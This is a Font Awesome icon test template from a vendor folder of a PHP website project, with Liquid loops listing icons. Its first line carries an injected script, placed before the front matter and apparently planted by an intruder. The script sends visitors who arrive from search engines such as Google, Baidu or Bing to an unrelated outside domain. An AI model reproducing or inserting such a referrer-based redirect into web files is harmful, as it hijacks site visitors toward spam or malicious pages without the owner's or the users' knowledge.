d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\test\all.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>---
002: relative_path: ../../
003: ---
004:
005: <!DOCTYPE html>
006: <html>
007:   <head>
008:     <link rel="stylesheet" href="{{ page.relative_path }}assets/css/site.css">
009:     <link rel="stylesheet" href="{{ page.relative_path }}assets/font-awesome/css/font-awesome.css">
010:     <script src="https://use.fonticons.com/ffe176a3.js"></script>
011:   </head>
012:
013:   <body>
014:     <div class="container">
015:       <div>
016:         <h1>All</h1>
017:         <div>
018:           {% for icon in icons %}
019:           <i class="fa fa-{{ icon.id }}"></i>{% endfor %}
020:         </div>
021:       </div>
022:
023:
024:       <div>
025:         <h1>All (Unicode)</h1>
026:         {% for icon in icons %}
027:         <i class="fa">&#x{{ icon.unicode }}</i>
028:         {% endfor %}
029:       </div>
030:
031:       <div>
032:         <h1>Non-Brand (Unicode)</h1>
033:
034:         {% for icon in icons %}
035:           {% unless icon.categories contains "Brand Icons" %}
036:             <i class="fa">&#x{{ icon.unicode }}</i>
037:           {% endunless %}
038:         {% endfor %}
039:       </div>
040:
041:       <div>
042:         <h1>Brand (Unicode)</h1>
043:
044:         {% for icon in icons %}
045:           {% if icon.categories contains "Brand Icons" %}
046:           <i class="fa">&#x{{ icon.unicode }}</i>
047:           {% endif %}
048:         {% endfor %}
049:       </div>
050:
051:
052:     </div>
053:   </body>
054:
055: </html>
056:
057:
058: